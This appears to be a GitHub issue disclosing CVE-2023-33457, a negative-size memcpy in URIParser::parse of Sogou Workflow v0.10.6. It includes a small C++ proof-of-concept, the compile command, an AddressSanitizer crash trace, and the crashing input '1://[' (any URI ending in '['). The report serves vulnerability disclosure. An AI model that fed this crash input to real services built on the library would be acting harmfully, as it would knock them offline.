Headline
CVE-2023-33457: Vuln: memcpy a negtive size in URIParser::parse · Issue #1272 · sogou/workflow
In Sogou Workflow v0.10.6, memcpy a negtive size in URIParser::parse , may cause buffer-overflow and crash.
1、compile the program use asan with compile and link flag : "-fsanitize=address"
test.cc:
#include “workflow/WFTaskFactory.h”
#include “workflow/WFDnsClient.h”
#include
int main(){
std::string url = "1://[";
auto *task = WFTaskFactory::create_dns_task(url, 0, NULL);
}
compile the test.cc with the workflow lib and run:
g++ -fsanitize=address -g ./test.cc -I …/_include/ …/_lib/libworkflow.a -o testrun …/…/openssl-3.07/libssl.a …/…/openssl-3.07/libcrypto.a
Aasn find crash:
==1736885==ERROR: AddressSanitizer: negative-size-param: (size=-1)
#0 0x7ff0611ba3ff in __interceptor_memcpy …/…/…/…/src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
#1 0x55fd6300dd49 in URIParser::parse(char const*, ParsedURI&) /opt1/software/toyMan/testcve/workflow/src/util/URIParser.cc:404
#2 0x55fd62fe74c0 in URIParser::parse(std::__cxx11::basic_string<char, std::char_traits, std::allocator > const&, ParsedURI&) (/opt1/software/toyMan/testcve/workflow/test/testcloud+0x1ba4c0)
#3 0x55fd62fe6c87 in WFTaskFactory::create_dns_task(std::__cxx11::basic_string<char, std::char_traits, std::allocator > const&, int, std::function<void (WFNetworkTask<protocol::DnsRequest, protocol::DnsResponse>*)>) /opt1/software/toyMan/testcve/workflow/src/factory/DnsTaskImpl.cc:159
#4 0x55fd62fdb528 in easyloop test.cc:18
crashcase:
"1://[" and other string end with '['!!
the vuln is in URIParser::parse. this function missing check for len in line 404. when '[' in URI, there will calculates a negative value for len (-1). and may cause a Dos in crash when memcpy huge memory、code execution and information disclosure.